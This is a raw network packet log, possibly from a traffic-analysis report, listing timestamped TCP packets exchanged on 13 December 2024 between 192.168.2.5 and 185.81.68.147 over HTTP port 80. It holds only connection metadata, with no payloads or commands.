                                                                                                                                                                Dec 13, 2024 01:37:35.940109015 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940136909 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940148115 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940165043 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940323114 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940337896 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940346003 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940475941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940509081 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940515995 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940522909 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940555096 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940646887 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940685987 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940696955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940825939 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940829039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.940835953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940849066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940856934 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940911055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.940928936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.940948009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.940974951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.940995932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941013098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941021919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941021919 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941051006 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941060066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941082001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941085100 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941096067 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941138983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941154003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941176891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941190958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941216946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941239119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941247940 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941257000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.941257000 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941292048 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941299915 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941307068 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941328049 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941447973 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941467047 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941495895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941504955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941586971 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941608906 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941626072 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941783905 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941792965 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941819906 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.941828012 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942054033 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942065001 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942094088 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942231894 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942312002 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942323923 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942338943 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942347050 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942354918 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942372084 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942379951 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942558050 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942580938 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942616940 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942651987 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942667007 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942675114 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942780972 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942790985 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942796946 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942805052 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942811966 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942820072 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942822933 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.942842960 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946841955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946851015 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946877956 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946887016 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946893930 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946921110 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946932077 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946973085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946980953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.946994066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947021961 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947032928 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947045088 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947063923 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947072983 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947086096 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.947145939 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.950511932 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.950546026 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952358961 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952367067 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952373981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952382088 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952445030 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952452898 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952465057 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952472925 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952483892 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952495098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952532053 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952538967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952548981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952557087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952662945 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952671051 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952677011 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952685118 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952688932 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952696085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952703953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952713966 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952724934 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952732086 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952739954 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952747107 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952759981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952770948 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952778101 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952789068 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952800035 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952806950 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952810049 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952812910 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952821016 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952828884 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952836037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952843904 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952851057 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.952857971 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.960621119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960675955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960676908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960676908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960760117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960760117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960760117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960783005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960792065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960815907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960830927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960853100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960871935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960891008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960908890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960927963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960949898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960964918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.960988045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961010933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961034060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961081028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961091042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961117029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961131096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961153984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961169004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961194038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961209059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961230993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961245060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.961260080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963397980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963416100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963439941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963464975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963478088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963500977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963511944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963534117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.963551044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968255997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968271971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968297005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968311071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968362093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968362093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968390942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968415022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968436956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968460083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968477964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968498945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968514919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968539953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968616009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968616009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968616009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968632936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968652010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968664885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968688965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968713999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968735933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968760014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968776941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968800068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968813896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968839884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968869925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968894958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968918085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968933105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968949080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968964100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.968986988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.969002008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.969029903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.969053030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973069906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973087072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973110914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973124027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973149061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973159075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973182917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973196030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973215103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973231077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973252058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973267078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.973289013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.982167006 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.982177973 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.982381105 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.982686043 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.982733965 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.982743979 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.982752085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983545065 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983577967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983596087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983606100 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983634949 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983647108 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983658075 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983668089 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983676910 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983685970 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983692884 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983762026 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983772993 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983781099 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983788967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983798981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983807087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983815908 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983824968 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.983869076 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.984607935 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.986905098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.986957073 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.986965895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.986974955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987183094 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987194061 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987215042 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987224102 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987236023 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987246037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987296104 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987309933 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987339973 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987349033 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.987379074 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991022110 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991086006 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991090059 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991162062 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991170883 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991178989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991197109 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991225004 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991240978 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991250992 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991265059 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991290092 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991298914 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991309881 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991328955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991339922 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991353035 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991362095 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991365910 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991468906 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991478920 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991487026 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991491079 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.991498947 CET8049775185.81.68.147192.168.2.5
